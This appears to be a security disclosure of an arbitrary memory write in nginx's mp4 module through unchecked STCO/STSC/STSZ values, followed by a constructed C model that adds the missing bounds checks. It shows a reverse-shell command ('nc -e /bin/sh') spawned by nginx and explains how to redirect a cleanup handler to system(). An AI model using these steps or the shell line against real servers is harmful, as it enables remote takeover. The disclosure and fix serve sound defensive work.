I have found a possible security issue in nginx's mp4 module which allows remote code execution. By processing a crafted mp4 file, an attacker can cause arbitrary values to be written to arbitrary memory locations.

The issue is in the updating of the STCO atom. On line 2641 (of src/http/module/ngx_http_mp4_module.c), data->pos is moved by a scaled amount of trak->start_chunk, which is in turn set by the updating of the STSC atom (line 2382). This trak->start_chunk value is user-controlled, but is not checked when moving the data->pos pointer. After, the value trak->chunk_samples_size is added to the value at the pointer, and is written back out. trak->chunk_samples_size is user-controlled too (updating of STSZ atom), so both location and value are user-controlled deltas from their original values.

This can be exploited, as the attached file demonstrates (which creates a connectback shell to localhost:1234). It does this by adjusting the value of the pool file close handler (ngx_pool_cleanup_file) to point to system in libc, and the data it is called with to point to a command line string:

    $ nc -l -p 1234 &
    [1] 6737
    $ /usr/local/nginx/sbin/nginx &
    [2] 6738
    $ curl -m 1 localhost:8080/nginx.mp4?start=0
    curl: (28) Operation timed out after 1002 milliseconds with 0 bytes received
    $ fg 1
    nc -l -p 1234
    ps f
      PID TTY      STAT   TIME COMMAND
     6346 pts/4    Ss     0:01 /bin/bash
     6737 pts/4    S+     0:00  \_ nc -l -p 1234
     6738 pts/4    S      0:00  \_ /usr/local/nginx/sbin/nginx
     6740 pts/4    S      0:00      \_ sh -c nc -e /bin/sh localhost 1234
     6741 pts/4    S      0:00          \_ sh
     6742 pts/4    R      0:00              \_ ps f

Since the original call to ngx_pool_cleanup_file is in nginx's .text section whereas system is in libc's, an ASLR boundary is crossed; however, none of the other locations/values that are updated cross one.

    Location delta #1: STCO data buffer (request pool) -> ngx_pool_cleanup_t::handler (request pool)
    Value delta #1:    ngx_pool_cleanup_file (nginx .text) -> system (libc .text)   <-- ASLR crossed
    Location delta #2: STCO data buffer (request pool) -> ngx_pool_cleanup_t::data (request pool)
    Value delta #2:    ngx_pool_cleanup_file_t * (request pool) -> command line (request pool)

A more skilled attacker may be able to craft a file that doesn't cross any ASLR boundaries, and hence make it bypass ASLR protections.
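As an added illustration of the missing bound (this is not nginx's code and not the reporter's attached file), the following constructed C model performs the STCO read-modify-write the report describes, but refuses to move the pointer unless trak->start_chunk selects an entry that actually exists inside the atom's data buffer, and refuses an addition that would wrap the 32-bit offset. The struct names mirror the report (data->pos, trak->start_chunk, trak->chunk_samples_size) but are simplified, and it assumes 4-byte big-endian stco entries; the three-entry table it runs over is constructed sample data.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed model of the stco ("chunk offset") update described in the
 * report. Not nginx's code: the names mirror the report but the types are
 * simplified. Assumption: 32-bit big-endian stco entries, 4 bytes each. */

#define STCO_ENTRY_SIZE 4
#define MP4_OK    0
#define MP4_ERROR (-1)

typedef struct {
    unsigned char *pos;   /* first stco entry in the atom data buffer */
    unsigned char *last;  /* one past the end of the entry data */
} mp4_buf_t;

typedef struct {
    uint32_t start_chunk;        /* derived from the file's stsc atom */
    uint32_t chunk_samples_size; /* derived from the file's stsz atom */
} mp4_trak_t;

static uint32_t be32_get(const unsigned char *p)
{
    return ((uint32_t) p[0] << 24) | ((uint32_t) p[1] << 16)
         | ((uint32_t) p[2] << 8)  |  (uint32_t) p[3];
}

static void be32_put(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char) (v >> 24);
    p[1] = (unsigned char) (v >> 16);
    p[2] = (unsigned char) (v >> 8);
    p[3] = (unsigned char) v;
}

/* Number of whole entries actually present between pos and last. */
static uint32_t stco_entries(const mp4_buf_t *data)
{
    return (uint32_t) ((data->last - data->pos) / STCO_ENTRY_SIZE);
}

/* Update the first kept chunk offset. The report's defect is that pos is
 * moved by start_chunk entries and then written through without comparing
 * start_chunk against the number of entries in the buffer. That check and
 * a wrap-around check on the 32-bit addition are both applied here. */
int update_stco_checked(mp4_buf_t *data, mp4_trak_t *trak)
{
    uint32_t entries = stco_entries(data);
    unsigned char *entry;
    uint32_t offset;

    /* Bound the move: a start_chunk past the last entry would turn the
     * read-modify-write into a write outside the stco buffer. */
    if (trak->start_chunk >= entries) {
        return MP4_ERROR;
    }

    entry = data->pos + (size_t) trak->start_chunk * STCO_ENTRY_SIZE;
    offset = be32_get(entry);

    /* Reject an addition that would wrap the 32-bit chunk offset. */
    if (trak->chunk_samples_size > UINT32_MAX - offset) {
        return MP4_ERROR;
    }

    be32_put(entry, offset + trak->chunk_samples_size);
    data->pos = entry;
    return MP4_OK;
}

/* Run the update over a constructed three-entry stco table (offsets 0x100,
 * 0x200, 0x300). Returns the rewritten offset, or -1 if the input was
 * rejected. */
long long demo_update(uint32_t start_chunk, uint32_t chunk_samples_size)
{
    unsigned char stco[3 * STCO_ENTRY_SIZE];
    mp4_buf_t data = { stco, stco + sizeof stco };
    mp4_trak_t trak = { start_chunk, chunk_samples_size };
    uint32_t i;

    for (i = 0; i < 3; i++) {
        be32_put(stco + i * STCO_ENTRY_SIZE, 0x100u * (i + 1));
    }

    if (update_stco_checked(&data, &trak) != MP4_OK) {
        return -1;
    }
    return (long long) be32_get(data.pos);
}

int main(void)
{
    printf("in range:      %lld\n", demo_update(1, 0x10));           /* 528 (0x210) */
    printf("past the end:  %lld\n", demo_update(3, 0x10));           /* -1 */
    printf("huge index:    %lld\n", demo_update(0x40000000u, 0x10)); /* -1 */
    printf("wrapping size: %lld\n", demo_update(0, 0xFFFFFFFFu));    /* -1 */
    return 0;
}
```

The in-range case rewrites entry 1 from 0x200 to 0x210 and leaves data->pos on that entry, which is the intended behaviour; the other three inputs are the shapes a crafted stsc/stsz pair can produce (an index past the table, a scaled move far outside the request pool, and a size that wraps the offset) and each is rejected before any pointer is moved or written through.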